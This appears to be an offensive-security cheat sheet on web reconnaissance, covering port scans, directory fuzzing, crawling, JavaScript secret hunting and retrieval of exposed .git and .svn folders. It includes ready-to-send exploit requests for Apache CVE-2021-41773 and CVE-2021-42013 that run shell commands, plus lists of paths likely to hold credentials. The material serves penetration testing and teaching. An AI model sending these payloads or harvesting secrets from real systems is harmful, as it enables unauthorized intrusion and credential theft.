Recon
Also check for other exposed ports. Ex: 22, look for regsshion, etc. See Protocols
Copy nmap -p 80,443,8000,8080,8180,8888,1000 --open -oA web_discovery -iL scope_list
EyeWitness or Aquatone - See Information Gathering
SSL
HTTP/2 - DoS
Basic vulnerability scanning to see if web servers may be vulnerable to CVE-2023-44487
HTTP Methods
Apache Vulnerability Testing
CVE-2021-41773 (RCE and LFI)
Copy POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Content-Length: 7
Content-Type: application/x-www-form-urlencoded
Connection: close
echo;id
CVE-2021-42013 (RCE and LFI)
Copy POST /cgi-bin/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/bin/sh HTTP/1.1
Host: 127.0.0.1:8080
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 7
echo;id
Common files
Copy /.git
/.gitkeep
/.git-rewrite
/.gitreview
/.git/HEAD
/.gitconfig
/.git/index
/.git/logs
/.svnignore
/.gitattributes
/.gitmodules
/.svn/entries
robots.txt
-> robofinder: search for and retrieve historical robots.txt
files from Archive.org for any given website.
.git
.svn
.DS_Store
Copy # python ds_store_exp.py http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/.DS_Store
[200] http://10.13.X.X/JS/.DS_Store
[200] http://10.13.X.X/Images/.DS_Store
[200] http://10.13.X.X/dev/.DS_Store
<--SNIP-->
Misconfigurations on popular third-party services
Git Exposed
Nuclei Template: https://github.com/coffinxp/priv8-Nuclei/blob/main/git-exposed.yaml
Copy id: git-exposed
info:
name: Exposed Git Repository
author: kaks3c
severity: medium
description: |
Checks for exposed Git repositories by making requests to potential Git repository paths.
tags: p3,logs,git
http:
- raw:
- |
GET {{BaseURL}}{{path}} HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:119.0) Gecko/20100101 Firefox/119.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Connection: close
attack: pitchfork
payloads:
path:
- /.git/
- /.git/HEAD
- /.git/config
- /.git/logs/HEAD
- /.git/logs/
- /.git/description
- /.git/refs/heads/
- /.git/refs/remotes/
- /.git/objects/
matchers-condition: or
matchers:
- type: word
words:
- "commit (initial): Initial commit" #/.git/logs/HEAD
- "ref: refs/heads/" #/.git/HEAD
- "logallrefupdates = true" #/.git/config
- "repositoryformatversion = 0" #/.git/config
- "Index of /" #/.git/
- "You do not have permission to access /.git/" #403_/.git
- "Unnamed repository; edit this file 'description' to name the repository" #/.git/description
- type: regex
regex:
- "info/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
- "pack/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/objects/
- "master/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/heads/
- "origin/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/refs/remotes/
- "refs/\\s+\\d{4}-\\d{2}-\\d{2}\\s+\\d{2}:\\d{2}" #/.git/logs/
stop-at-first-match: true
.git
found => download the target .git
folder
Copy wget -r -np -nH --cut-dirs=1 -R "index.html*" http://dev.dumpme.htb/.git/
Or with tools:
Copy $ git clone https://github.com/deletescape/goop
$ cd goop
$ go build
$ ./goop http://dev.dumpme.htb
After that, search for creds, etc:
SVN Expoxed
Copy ./svn-extractor.py --url http://url.com --match database.php
PHPMyAdmin
target[.]com/phpmyadmin/setup/index.php
==> 301 to login page
target[.]com/phpMyAdmin/setup/index.php
==> 200 to phpmyadmin setup
WSAAR
OWASP Noir
Copy $ noir -b . -u http://example.com
$ noir -b . -u http://example.com --passive-scan
Wayback Machine
Copy # RECON METHOD BY ~/.COFFINXP
https://web.archive.org/cdx/search/cdx?url=*.example.com/*&collapse=urlkey&output=text&fl=original
curl -G "https://web.archive.org/cdx/search/cdx" --data-urlencode "url=*.example.com/*" --data-urlencode "collapse=urlkey" --data-urlencode "output=text" --data-urlencode "fl=original" > out.txt
cat out.txt | uro | grep -E '\.xls|\.xml|\.xlsx|\.json|\.pdf|\.sql|\.doc|\.docx|\.pptx|\.txt|\.zip|\.tar\.gz|\.tgz|\.bak|\.7z|\.rar|\.log|\.cache|\.secret|\.db|\.backup|\.yml|\.gz|\.config|\.csv|\.yaml|\.md|\.md5|\.exe|\.dll|\.bin|\.ini|\.bat|\.sh|\.tar|\.deb|\.rpm|\.iso|\.img|\.apk|\.msi|\.dmg|\.tmp|\.crt|\.pem|\.key|\.pub|\.asc'
Backup Files
Copy ffuf -w subdomains.txt:SUB -w payloads/backup_files_only.txt:FILE -u https://SUB/FILE -mc 200 -rate 50 -fs 0 -c -x http://localip:8080
Fuzzili
Copy echo http://target.com | fuzzuli -p
Burp Extension
Archived Backups
Look for metadata
Extract URLs and paths from web pages
Manually
Copy javascript:(function(){var scripts=document.getElementsByTagName("script"),regex=/(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))/g;const results=new Set;for(var i=0;i<scripts.length;i++){var t=scripts[i].src;""!=t&&fetch(t).then(function(t){return t.text()}).then(function(t){var e=t.matchAll(regex);for(let r of e)results.add(r[0])}).catch(function(t){console.log("An error occurred: ",t)})}var pageContent=document.documentElement.outerHTML,matches=pageContent.matchAll(regex);for(const match of matches)results.add(match[0]);function writeResults(){results.forEach(function(t){document.write(t+"<br>")})}setTimeout(writeResults,3e3);})();
Open Console (ctrl + shift + i) + Allow pasting
("autoriser le collage
") + copy paste JS code + click on bookmark
Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA
Gourlex
Copy gourlex -t domain.com
xnLinkFinder
Copy xnLinkfinder -i bugcrowd.com -sp https://www.bugcrowd.com -sf "bugcrowd.*" -d2 -v
Command breakdown:
Copy -i http://bugcrowd.com → Target domain
-sp https://bugcrowd.com → Scope prefix
-sf "bugcrowd.*" → Scope filter
-d 2 → Crawl depth
https://github.com/mhmdiaa/chronos
-v → Verbose output
Hakrawler
Copy echo https://google.com | hakrawler
Waybackurls
Katana & Urlfinder
Copy katana -u https://tesla.com
Copy urlfinder -d tesla.com
GetAllURL - gau
Copy gau https://target.com
LinkFinder
Copy python3 linkfinder.py -i https://example.com/app.js
Copy $ python linkfinder.py -i 'js/*' -o result.html
$ python linkfinder.py -i 'js/*' -o cli
LazyEgg
ReconSpider
See Fingerprinting / Crawling
Metadata
JS Files
Sensitive JS Files
Copy ffuf -w subdomains.txt:SUB -w payloads/senstivejs.txt:FILE -u https://SUB/FILE -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0" -fs 0 -c -mc 200 -fr false -rate 10 -t 10
Copy /js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
Burp
Source: NahamCon2024: .js Files Are Your Friends | @zseano https://www.youtube.com/watch?v=fQoxjBwQZUA
Detect secrets
Copy ./trufflehog filesystem ~/Downloads/js --no-verification --include-detectors="all"
Burp Extension
Code Analysis
Copy semgrep scan --config auto
JSFScan.sh
Copy 1 - Gather Jsfile Links from different sources.
2 - Import File Containing JSUrls
3 - Extract Endpoints from Jsfiles
4 - Find Secrets from Jsfiles
5 - Get Jsfiles store locally for manual analysis
6 - Make a Wordlist from Jsfiles
7 - Extract Variable names from jsfiles for possible XSS.
8 - Scan JsFiles For DomXSS.
9 - Generate Html Report.
Copy bash JFScan.sh -l target.txt --all -r -o outputdir
Morgan
Identify sensitive information, vulnerabilities, and potential risks within JavaScript files on websites
GetJS
JSHunter
Endpoint Extraction and Sensitive Data Detection
Copy cat urls.txt | grep "\.js" | jshunter
Javascript Deobfuscator
Online
API Endpoint in JS File
Copy cat file.js | grep -aoP "(?<=(\"|\'|\`))\/[a-zA-Z0-9_?&=\/\-\#\.]*(?=(\"|\'|\`))" | sort -u
JSNinja
JS Link Finder
Jsluice
Sensitive data in JS Files
Top 25 JavaScript path files used to store sensitive information
Copy /js/config.js
/js/credentials.js
/js/secrets.js
/js/keys.js
/js/password.js
/js/api_keys.js
/js/auth_tokens.js
/js/access_tokens.js
/js/sessions.js
/js/authorization.js
/js/encryption.js
/js/certificates.js
/js/ssl_keys.js
/js/passphrases.js
/js/policies.js
/js/permissions.js
/js/privileges.js
/js/hashes.js
/js/salts.js
/js/nonces.js
/js/signatures.js
/js/digests.js
/js/tokens.js
/js/cookies.js
/js/topsecr3tdonotlook.js
JS Miner - Burp Extension
X-Keys - Burp Extension
jsluice++ - Burp Extension
SecretFinder
Mantra
Testing API Key
Google Maps API Key
Hidden Parameter
This useful option in Burp Suite makes every hidden input field (often with a reference to a hidden parameter) visible
Proxy Settings >>> Response modification rules >>> Unhide hidden form fields
Parameters fuzzing
x8
Hidden parameters discovery
Arjun
Copy $ python3 /opt/Arjun/arjun.py -u http://target_address.com
$ python3 /opt/Arjun/arjun.py -u http://target_address.com -o arjun_results.json
If you’ve been proxying traffic with Burp Suite, you can select all URLs within the sitemap, use the Copy Selected URLs option, and paste that list to a text file. Then run Arjun against all Burp Suite targets simultaneously, like this:
Copy $ python3 /opt/Arjun/arjun.py -i burp_targets.txt
Parmahunter
Wordlists
Common extensions: raft-[ small | medium | large ]-extensions.txt
from SecList Web-Content
Copy cewl -m5 --lowercase -w wordlist.txt http://192.168.10.10
Fuzz using different HTTP methods
Copy ffuf -u https://api.example.com/PATH -X METHOD -w /path/to/wordlist:PATH -w /path/to/http_methods:METHOD
Admin interfaces
Backups
Config files
SQL files
Vulnerability Assessment
Copy sudo nmap 10.129.2.28 -p 80 -sV --script vuln
Nmap scan report for 10.129.2.28
Host is up (0.036s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
| http-enum:
| /wp-login.php: Possible admin folder
| /readme.html: Wordpress version: 2
| /: WordPress version: 5.3.4
| /wp-includes/images/rss.png: Wordpress version 2.2 found.
| /wp-includes/js/jquery/suggest.js: Wordpress version 2.5 found.
| /wp-includes/images/blank.gif: Wordpress version 2.6 found.
| /wp-includes/js/comment-reply.js: Wordpress version 2.7 found.
| /wp-login.php: Wordpress login page.
| /wp-admin/upgrade.php: Wordpress login page.
|_ /readme.html: Interesting, a readme.
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-wordpress-users:
| Username found: admin
|_Search stopped at ID #25. Increase the upper limit if necessary with 'http-wordpress-users.limit'
| vulners:
| cpe:/a:apache:http_server:2.4.29:
| CVE-2019-0211 7.2 https://vulners.com/cve/CVE-2019-0211
| CVE-2018-1312 6.8 https://vulners.com/cve/CVE-2018-1312
| CVE-2017-15715 6.8 https://vulners.com/cve/CVE-2017-15715
Lostfuzzer
Admin interface
CMS
Crawling
Crawl with 2 separate user-agent
Always crawl with 2 separate user-agent headers, one for desktop and one for mobile devices and look for response changes!
Copy gospider -s "http://app.example.com" -c 3 --depth 3 --no-redirect --user-agent "Mozilla/5.0 (iPhone; CPU iPhone OS 15_1_1 like Mac OS X..." -o mobile_endpoints.txt
Gospider
Hakrawler
With Burp
With Zap
Copy sudo snap install zaproxy --classic
Fuzz
Wordlists
Copy gobuster dir -u http://10.10.10.121/ -w /usr/share/dirb/wordlists/common.txt
Copy ffuf -recursion -recursion-depth 1 -u http://192.168.10.10/FUZZ -w /opt/useful/SecLists/Discovery/Web-Content/raft-small-directories-lowercase.txt
Copy ffuf -w ./folders.txt:FOLDERS,./wordlist.txt:WORDLIST,./extensions.txt:EXTENSIONS -u http://192.168.10.10/FOLDERS/WORDLISTEXTENSIONS
Banner grabbing
Copy curl -IL https://www.inlanefreight.com
Tool: https://github.com/FortyNorthSecurity/EyeWitness ; or Aquatone
Copy whatweb 10.10.10.121
whatweb --no-errors 10.10.10.0/24
DNS Subdomain Enumeration
Cloudflare Bypass for Web Scraping